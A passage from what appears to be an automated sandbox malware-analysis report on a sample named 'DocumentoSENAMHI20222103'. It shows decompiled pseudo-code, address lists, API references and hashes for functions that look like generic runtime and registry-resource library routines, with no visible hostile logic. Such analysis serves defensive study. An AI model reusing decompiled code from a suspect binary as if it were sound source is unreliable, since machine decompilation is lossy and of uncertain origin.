								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E00158B82( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E00158B82(_t283);
						goto L31;
					}
				} else {
					_t219 = E001575D4(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E0015748C();
					L31:
					return _t297;
				}
				L81:
			}

0x0015a041
0x0015a044
0x0015a047
0x0015a048
0x0015a04a
0x0015a060
0x0015a064
0x0015a067
0x0015a069
0x0015a06b
0x0015a06d
0x0015a06f
0x0015a072
0x0015a075
0x0015a078
0x0015a07a
0x0015a0dd
0x0015a0df
0x0015a0e2
0x0015a0e4
0x0015a0e8
0x0015a0f1
0x0015a0f2
0x0015a0f5
0x0015a0f7
0x0015a0fa
0x0015a0fe
0x0015a0fe
0x0015a100
0x0015a102
0x0015a104
0x0015a106
0x0015a106
0x0015a108
0x0015a10b
0x0015a10e
0x0015a10e
0x0015a110
0x0015a111
0x0015a111
0x0015a11c
0x0015a11e
0x0015a121
0x0015a122
0x0015a125
0x0015a125
0x0015a129
0x0015a12c
0x0015a12f
0x0015a12f
0x0015a12f
0x0015a13c
0x0015a13e
0x0015a141
0x0015a143
0x0015a15b
0x0015a15e
0x0015a161
0x0015a163
0x0015a166
0x0015a168
0x0015a16b
0x0015a16e
0x0015a1cb
0x0015a1ce
0x0015a1d1
0x0015a1d3
0x00000000
0x0015a170
0x0015a172
0x0015a172
0x0015a174
0x0015a177
0x0015a177
0x0015a179
0x0015a17b
0x0015a181
0x0015a184
0x0015a184
0x0015a186
0x0015a187
0x0015a187
0x0015a18e
0x0015a191
0x0015a195
0x0015a1a2
0x0015a1a7
0x0015a1aa
0x0015a1ac
0x0015a220
0x0015a221
0x0015a222
0x0015a223
0x0015a224
0x0015a225
0x0015a22a
0x0015a22e
0x0015a230
0x0015a231
0x0015a234
0x0015a234
0x0015a237
0x0015a237
0x0015a239
0x0015a23a
0x0015a23a
0x0015a23e
0x0015a23f
0x0015a246
0x0015a249
0x0015a24c
0x0015a24e
0x0015a256
0x0015a257
0x0015a258
0x0015a25b
0x0015a265
0x0015a269
0x0015a26b
0x0015a27f
0x0015a27f
0x0015a282
0x0015a28c
0x0015a291
0x0015a294
0x0015a296
0x00000000
0x0015a298
0x0015a298
0x0015a29d
0x0015a2a4
0x0015a2a7
0x0015a2a9
0x0015a2ba
0x0015a2bc
0x0015a2be
0x0015a2be
0x0015a2be
0x0015a2ab
0x0015a2ac
0x0015a2b1
0x0015a2b4
0x0015a2c3
0x0015a2c9
0x00000000
0x0015a2cc
0x0015a26d
0x0015a26d
0x0015a273
0x0015a278
0x0015a27b
0x0015a27d
0x0015a2cf
0x0015a2d1
0x0015a2d2
0x0015a2d3
0x0015a2d4
0x0015a2d5
0x0015a2d6
0x0015a2db
0x0015a2de
0x0015a2df
0x0015a2e1
0x0015a2e7
0x0015a2ee
0x0015a2f1
0x0015a2f4
0x0015a2f7
0x0015a2f8
0x0015a2f9
0x0015a2fc
0x0015a302
0x0015a304
0x0015a306
0x0015a306
0x0015a308
0x0015a30a
0x00000000
0x00000000
0x0015a30c
0x0015a30e
0x0015a310
0x0015a312
0x0015a31d
0x0015a31f
0x0015a321
0x00000000
0x00000000
0x0015a321
0x0015a312
0x00000000
0x0015a30e
0x0015a323
0x0015a323
0x0015a329
0x0015a32b
0x0015a331
0x0015a333
0x0015a355
0x0015a355
0x0015a357
0x0015a359
0x0015a365
0x0015a365
0x0015a35b
0x0015a35b
0x0015a35d
0x00000000
0x0015a35f
0x0015a35f
0x0015a361
0x0015a363
0x00000000
0x00000000
0x0015a363
0x0015a35d
0x0015a36d
0x0015a375
0x0015a37b
0x0015a37c
0x0015a37e
0x0015a386
0x0015a38c
0x0015a392
0x0015a398
0x0015a3ac
0x0015a3b1
0x0015a3bc
0x0015a3cc
0x0015a3d2
0x0015a3d4
0x0015a3d7
0x0015a3fa
0x0015a3fa
0x0015a3ff
0x0015a405
0x0015a405
0x0015a40b
0x0015a411
0x0015a417
0x0015a41d
0x0015a423
0x0015a444
0x0015a449
0x0015a44e
0x0015a452
0x0015a458
0x0015a45b
0x0015a46e
0x0015a46e
0x0015a474
0x0015a47a
0x0015a47b
0x0015a47c
0x0015a481
0x0015a484
0x0015a48a
0x0015a48c
0x0015a4ea
0x0015a4f0
0x0015a4f8
0x0015a4fd
0x0015a503
0x0015a504
0x00000000
0x00000000
0x00000000
0x0015a45d
0x0015a45d
0x0015a460
0x0015a462
0x00000000
0x0015a464
0x0015a464
0x0015a467
0x00000000
0x0015a469
0x0015a469
0x0015a46c
0x00000000
0x00000000
0x00000000
0x00000000
0x0015a46c
0x0015a467
0x0015a462
0x0015a506
0x0015a507
0x00000000
0x0015a48e
0x0015a48e
0x0015a494
0x0015a49c
0x0015a4a1
0x0015a4b0
0x0015a4b0
0x0015a4b8
0x0015a4be
0x0015a4c4
0x0015a4cb
0x0015a4ce
0x0015a4d0
0x0015a4e0
0x0015a4e5
0x00000000
0x0015a3d9
0x0015a3d9
0x0015a3df
0x0015a3e0
0x0015a3e1
0x0015a3e2
0x0015a3ea
0x0015a3ea
0x0015a50d
0x0015a50d
0x0015a514
0x0015a515
0x0015a51d
0x0015a522
0x0015a523
0x0015a335
0x0015a335
0x0015a338
0x0015a33a
0x0015a34f
0x00000000
0x0015a33c
0x0015a33c
0x0015a33f
0x0015a340
0x0015a341
0x0015a342
0x0015a347
0x0015a33a
0x0015a528
0x0015a529
0x0015a52b
0x0015a532
0x00000000
0x00000000
0x00000000
0x0015a27d
0x0015a250
0x0015a252
0x0015a253
0x0015a255
0x0015a255
0x00000000
0x00000000
0x00000000
0x00000000
0x0015a1ae
0x0015a1ae
0x0015a1b4
0x0015a1b7
0x0015a1ba
0x0015a1bd
0x0015a1c0
0x0015a1c3
0x0015a1c6
0x0015a1c6
0x00000000
0x0015a177
0x0015a145
0x0015a145
0x0015a148
0x0015a1d5
0x0015a1d6
0x0015a1db
0x00000000
0x0015a1db
0x0015a07c
0x0015a07c
0x0015a07f
0x0015a087
0x0015a08a
0x0015a091
0x0015a093
0x0015a095
0x0015a0b0
0x0015a0b1
0x0015a0b2
0x0015a0b3
0x0015a0b8
0x0015a0bb
0x0015a0be
0x0015a097
0x0015a097
0x0015a09a
0x0015a09b
0x0015a09c
0x0015a09d
0x0015a09e
0x0015a0a3
0x0015a0a5
0x0015a0a8
0x0015a0a8
0x0015a0c0
0x0015a0c2
0x00000000
0x00000000
0x0015a0cb
0x0015a0ce
0x0015a0d1
0x0015a0d3
0x0015a0d5
0x00000000
0x0015a0d7
0x0015a0d7
0x0015a0da
0x00000000
0x0015a0da
0x00000000
0x0015a0d5
0x0015a150
0x0015a1dc
0x0015a1df
0x0015a1e3
0x0015a1ec
0x0015a1ef
0x0015a1f3
0x0015a1f3
0x0015a1f5
0x0015a1f8
0x0015a1fa
0x0015a1fc
0x0015a1fe
0x0015a203
0x0015a204
0x0015a208
0x0015a208
0x0015a20c
0x0015a20f
0x0015a20f
0x0015a213
0x00000000
0x0015a21a
0x0015a04c
0x0015a04c
0x0015a053
0x0015a054
0x0015a056
0x0015a21b
0x0015a21f
0x0015a21f
0x00000000

APIs

_free.LIBCMT ref: 0015A1D6

Strings

*?, xrefs: 0015A07F

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 0ca23289a21784777a574ee5e7f0836160660e8685b7c3789ef03d27af64651c
Instruction ID: 589573e1a57ca06a8f0e6ef020fd7d952fddca014bc7384a0f32e0d70ac4af0c
Opcode Fuzzy Hash: 0ca23289a21784777a574ee5e7f0836160660e8685b7c3789ef03d27af64651c
Instruction Fuzzy Hash: 8E613BB5D40219DFCB14CFA8C8815EEBBF5EF58311F24826AE825EB340D731AE458B91

Uniqueness

Uniqueness Score: -1.00%

Function 00152049 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00152049(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr* __edi, void* __esi, void* __eflags) {
				void* _t27;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t44;
				void* _t45;
				intOrPtr* _t64;
				void* _t65;
				void* _t66;
				void* _t68;
				void* _t69;

				_t62 = __edi;
				_push(0x14);
				E00160216(0x1607c7, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t65 - 0x1c)) = __edx;
				 *((intOrPtr*)(_t65 - 0x20)) = __ecx;
				_t64 = 0;
				 *((intOrPtr*)(_t65 - 0x18)) = 0;
				 *(_t65 - 4) =  *(_t65 - 4) & 0;
				_t43 =  *((intOrPtr*)(_t65 + 8));
				if( *((intOrPtr*)(_t65 + 8)) == 0) {
					_t44 = 0x80070057;
				} else {
					_t26 = E001575E7(_t43) + 1;
					 *((intOrPtr*)(_t65 - 0x14)) = E001575E7(_t43) + 1;
					_t27 = E00151181(_t65 - 0x14, _t26);
					_t68 = _t66 + 4;
					if(_t27 >= 0) {
						_t62 =  *((intOrPtr*)(_t65 - 0x14));
						__eflags =  *((intOrPtr*)(_t65 - 0x14)) - 0x400;
						if(__eflags > 0) {
							L6:
							_t28 = E00153CD7(_t65 - 0x18, _t64, _t62);
							_t64 =  *((intOrPtr*)(_t65 - 0x18));
						} else {
							_t39 = E001511AE(_t43, _t62, _t62, 0, __eflags);
							__eflags = _t39;
							if(_t39 == 0) {
								goto L6;
							} else {
								E001602F0(_t62);
								_t28 = _t68;
							}
						}
						_t45 = E00151251(_t28, _t43, _t62, 3);
					} else {
						_t45 = 0;
					}
					_t31 = E001575E7(L"REGISTRY") + 1;
					 *((intOrPtr*)(_t65 - 0x14)) = E001575E7(L"REGISTRY") + 1;
					_t32 = E00151181(_t65 - 0x14, _t31);
					_t69 = _t68 + 4;
					if(_t32 >= 0) {
						_t62 =  *((intOrPtr*)(_t65 - 0x14));
						__eflags =  *((intOrPtr*)(_t65 - 0x14)) - 0x400;
						if(__eflags > 0) {
							L13:
							_t33 = E00153CD7(_t65 - 0x18, _t64, _t62);
							_t64 =  *((intOrPtr*)(_t65 - 0x18));
						} else {
							_t36 = E001511AE(_t45, _t62, _t62, _t64, __eflags);
							__eflags = _t36;
							if(_t36 == 0) {
								goto L13;
							} else {
								E001602F0(_t62);
								_t33 = _t69;
							}
						}
						_t34 = E00151251(_t33, L"REGISTRY", _t62, 3);
					} else {
						_t34 = 0;
					}
					if(_t45 == 0) {
						L18:
						_t44 = 0x8007000e;
					} else {
						_t75 = _t34;
						if(_t34 == 0) {
							goto L18;
						} else {
							_t44 = E00151B39(_t45,  *((intOrPtr*)(_t65 - 0x20)), _t62, _t64, _t75,  *((intOrPtr*)(_t65 - 0x1c)), _t45, _t34, 0);
						}
					}
				}
				if(_t64 != 0) {
					do {
						_t62 =  *_t64;
						_t64 = _t62;
						E00157188(_t64);
					} while (_t62 != 0);
				}
				return E001601C5(_t44, _t62, _t64);
			}

0x00152049
0x00152049
0x00152050
0x00152055
0x00152058
0x0015205b
0x0015205d
0x00152060
0x00152063
0x00152068
0x00152149
0x0015206e
0x00152074
0x0015207a
0x0015207d
0x00152082
0x00152087
0x0015208d
0x00152090
0x00152096
0x001520ae
0x001520b2
0x001520b7
0x00152098
0x0015209a
0x0015209f
0x001520a1
0x00000000
0x001520a3
0x001520a5
0x001520aa
0x001520aa
0x001520a1
0x001520c6
0x00152089
0x00152089
0x00152089
0x001520d2
0x001520d8
0x001520db
0x001520e0
0x001520e5
0x001520eb
0x001520ee
0x001520f4
0x0015210c
0x00152110
0x00152115
0x001520f6
0x001520f8
0x001520fd
0x001520ff
0x00000000
0x00152101
0x00152103
0x00152108
0x00152108
0x001520ff
0x00152122
0x001520e7
0x001520e7
0x001520e7
0x00152129
0x00152142
0x00152142
0x0015212b
0x0015212b
0x0015212d
0x00000000
0x0015212f
0x0015213e
0x0015213e
0x0015212d
0x00152129
0x00152150
0x00152152
0x00152152
0x00152155
0x00152157
0x0015215d
0x00152152
0x0015216b

APIs

__EH_prolog3_GS.LIBCMT ref: 00152050
__alloca_probe_16.LIBCMT ref: 001520A5

Part of subcall function 001511AE: __alloca_probe_16.LIBCMT ref: 001511D1

__alloca_probe_16.LIBCMT ref: 00152103

Strings

REGISTRY, xrefs: 001520C8, 0015211B

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: __alloca_probe_16$H_prolog3_
String ID: REGISTRY
API String ID: 2219512784-194740550
Opcode ID: 736de490c577c2610840b15c2de7ff3f36cf9b60261cc9749fa32b1ad60177d4
Instruction ID: ae7b4525fd85e61b5292ec4932a3388b832a9190d7c004caa5c67ea4ed5fc413
Opcode Fuzzy Hash: 736de490c577c2610840b15c2de7ff3f36cf9b60261cc9749fa32b1ad60177d4
Instruction Fuzzy Hash: A9318873F00605DBDB11AAA4CCC26BF72A55FA5702F154029FE22BF281EB749D098791

Uniqueness

Uniqueness Score: -1.00%

Function 00151E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00151E71(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t28;
				void* _t29;
				void* _t33;
				void* _t35;
				void* _t40;
				void* _t44;
				intOrPtr* _t46;
				intOrPtr* _t64;
				intOrPtr _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;
				void* _t71;
				void* _t72;

				_push(0x14);
				E00160216(0x1607c7, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t68 - 0x1c)) = __edx;
				 *((intOrPtr*)(_t68 - 0x20)) = __ecx;
				_t64 = 0;
				_t67 = 0;
				 *((intOrPtr*)(_t68 - 0x18)) = 0;
				 *((intOrPtr*)(_t68 - 4)) = 0;
				if( *((intOrPtr*)(_t68 + 8)) == 0) {
					_t44 = 0x80070057;
				} else {
					_t27 = E001575E7( *((intOrPtr*)(_t68 + 8))) + 1;
					 *((intOrPtr*)(_t68 - 0x14)) = E001575E7( *((intOrPtr*)(_t68 + 8))) + 1;
					_t28 = E00151181(_t68 - 0x14, _t27);
					_t71 = _t69 + 4;
					if(_t28 >= 0) {
						_t45 =  *((intOrPtr*)(_t68 - 0x14));
						__eflags =  *((intOrPtr*)(_t68 - 0x14)) - 0x400;
						if(__eflags > 0) {
							L6:
							_t29 = E00153CD7(_t68 - 0x18, _t67, _t45);
							_t67 =  *((intOrPtr*)(_t68 - 0x18));
						} else {
							_t40 = E001511AE(_t45, _t45, 0, 0, __eflags);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L6;
							} else {
								E001602F0(_t45);
								_t29 = _t71;
							}
						}
						_t46 = E00151251(_t29,  *((intOrPtr*)(_t68 + 8)), _t45, 3);
					} else {
						_t46 = 0;
					}
					_t32 = E001575E7(L"REGISTRY") + 1;
					 *((intOrPtr*)(_t68 - 0x14)) = E001575E7(L"REGISTRY") + 1;
					_t33 = E00151181(_t68 - 0x14, _t32);
					_t72 = _t71 + 4;
					if(_t33 >= 0) {
						_t65 =  *((intOrPtr*)(_t68 - 0x14));
						_t77 = _t65 - 0x400;
						if(_t65 > 0x400 || E001511AE(_t46, _t65, _t65, _t67, _t77) == 0) {
							_t35 = E00153CD7(_t68 - 0x18, _t67, _t65);
							_t67 =  *((intOrPtr*)(_t68 - 0x18));
						} else {
							E001602F0(_t65);
							_t35 = _t72;
						}
						_t64 = E00151251(_t35, L"REGISTRY", _t65, 3);
					}
					if(_t46 == 0) {
						L17:
						_t44 = 0x8007000e;
					} else {
						_t80 = _t64;
						if(_t64 == 0) {
							goto L17;
						} else {
							_t44 = E00151B39(_t46,  *((intOrPtr*)(_t68 - 0x20)), _t64, _t67, _t80,  *((intOrPtr*)(_t68 - 0x1c)), _t46, _t64, 1);
						}
					}
				}
				if(_t67 != 0) {
					do {
						_t64 =  *_t67;
						_t67 = _t64;
						E00157188(_t67);
					} while (_t64 != 0);
				}
				return E001601C5(_t44, _t64, _t67);
			}

0x00151e71
0x00151e78
0x00151e7d
0x00151e80
0x00151e83
0x00151e85
0x00151e87
0x00151e8a
0x00151e90
0x00151f72
0x00151e96
0x00151e9e
0x00151ea4
0x00151ea7
0x00151eac
0x00151eb1
0x00151eb7
0x00151eba
0x00151ec0
0x00151ed8
0x00151edc
0x00151ee1
0x00151ec2
0x00151ec4
0x00151ec9
0x00151ecb
0x00000000
0x00151ecd
0x00151ecf
0x00151ed4
0x00151ed4
0x00151ecb
0x00151ef1
0x00151eb3
0x00151eb3
0x00151eb3
0x00151efd
0x00151f03
0x00151f06
0x00151f0b
0x00151f10
0x00151f12
0x00151f15
0x00151f1b
0x00151f37
0x00151f3c
0x00151f28
0x00151f2a
0x00151f2f
0x00151f2f
0x00151f4e
0x00151f4e
0x00151f52
0x00151f6b
0x00151f6b
0x00151f54
0x00151f54
0x00151f56
0x00000000
0x00151f58
0x00151f67
0x00151f67
0x00151f56
0x00151f52
0x00151f79
0x00151f7b
0x00151f7b
0x00151f7e
0x00151f80
0x00151f86
0x00151f7b
0x00151f94

APIs

__EH_prolog3_GS.LIBCMT ref: 00151E78
__alloca_probe_16.LIBCMT ref: 00151ECF
__alloca_probe_16.LIBCMT ref: 00151F2A

Strings

REGISTRY, xrefs: 00151EF3, 00151F42

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: __alloca_probe_16$H_prolog3_
String ID: REGISTRY
API String ID: 2219512784-194740550
Opcode ID: 46c2c459ec1226f67541814fe03443f0558d80c3d97f054fd3f62e99906f9b2f
Instruction ID: 8f8ceec760dd02ba6e36e8aaa2cb8344d752341156b311693e5f225fe2b8e895
Opcode Fuzzy Hash: 46c2c459ec1226f67541814fe03443f0558d80c3d97f054fd3f62e99906f9b2f
Instruction Fuzzy Hash: D2317832F00605FBDB03AAA48C82BBF76759F94741F154129BD21BF242EB749D0D8791

Uniqueness

Uniqueness Score: -1.00%

Function 00155EBA Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E00155EBA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x167098);
				E00154730(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E001556D0(_t107, E00155496(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E001556D0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x292740; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x161278();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E00158A26(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x1670b8);
									E00154730(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E00155EBA(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00156BC0(_t103, _t108[0x18], E00155496( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00156BD0(_t103, _t108[0x18], E00155496( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E00155496();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x00155eba
0x00155ebc
0x00155ec1
0x00155ec6
0x00155ec8
0x00155ecb
0x00155ed0
0x00155fe0
0x00155fe0
0x00155fe0
0x00000000
0x00155edf
0x00155edf
0x00155ee4
0x00155eee
0x00155ef0
0x00155ef5
0x00155efa
0x00155efa
0x00155efc
0x00155eff
0x00155f04
0x00155f26
0x00155f26
0x00155f29
0x00155f2c
0x00155f4a
0x00155f4d
0x00155f8c
0x00155f8f
0x00155f92
0x00155fb7
0x00155fb9
0x00000000
0x00155fbb
0x00155fbb
0x00155fbd
0x00000000
0x00155fbf
0x00155fbf
0x00155fc4
0x00155fc8
0x00155fc8
0x00155fc9
0x00000000
0x00155fc9
0x00155fbd
0x00155f94
0x00155f94
0x00155f96
0x00000000
0x00155f98
0x00155f98
0x00155f9a
0x00000000
0x00155f9c
0x00155fad
0x00000000
0x00155fb2
0x00155f9a
0x00155f96
0x00155f4f
0x00155f4f
0x00155f53
0x00000000
0x00155f59
0x00155f59
0x00155f5b
0x00000000
0x00155f61
0x00155f68
0x00155f70
0x00155f74
0x00155f76
0x00155f79
0x00155f7e
0x00155f7f
0x00000000
0x00155f7f
0x00155f79
0x00000000
0x00155f74
0x00155f5b
0x00155f53
0x00155f2e
0x00155f2e
0x00000000
0x00155f2e
0x00155f0b
0x00155f0b
0x00155f10
0x00155f15
0x00000000
0x00155f17
0x00155f19
0x00155f22
0x00155f31
0x00155f33
0x00155ff2
0x00155ff2
0x00155ff7
0x00155ff8
0x00155ffa
0x00155fff
0x00156004
0x00156007
0x0015600a
0x0015600d
0x00156016
0x00156016
0x0015600f
0x0015600f
0x0015600f
0x00156019
0x0015601d
0x00156020
0x00156021
0x00156022
0x00156023
0x00156026
0x0015602f
0x0015602f
0x00156032
0x00156068
0x00156034
0x00156034
0x00156034
0x00156037
0x0015604e
0x0015604e
0x00156037
0x0015606d
0x00156077
0x00156083
0x00155f41
0x00155f41
0x00155f46
0x00155f47
0x00155f81
0x00155f88
0x00155fcc
0x00155fcc
0x00155fd3
0x00155fe2
0x00155fe5
0x00155ff1
0x00155ff1
0x00155f33
0x00155f15
0x00000000
0x00000000
0x00000000
0x00155ee4

APIs

___AdjustPointer.LIBCMT ref: 00155F81
___AdjustPointer.LIBCMT ref: 00155FA4
___AdjustPointer.LIBCMT ref: 00156040

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: c909967e20af84fc33e0822522d4695dd96080b323b5a71f6002726be67f817b
Instruction ID: c4fec75e1e888b322c400bf4638fee26083fa602b8df5b0c86e71eda3e83d1a6
Opcode Fuzzy Hash: c909967e20af84fc33e0822522d4695dd96080b323b5a71f6002726be67f817b
Instruction Fuzzy Hash: 5151E371605A12EFDB288F50D861B6AB7A6EF14312F24442EFC318F690E731AC89C790

Uniqueness

Uniqueness Score: -1.00%

Function 00159F50 Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

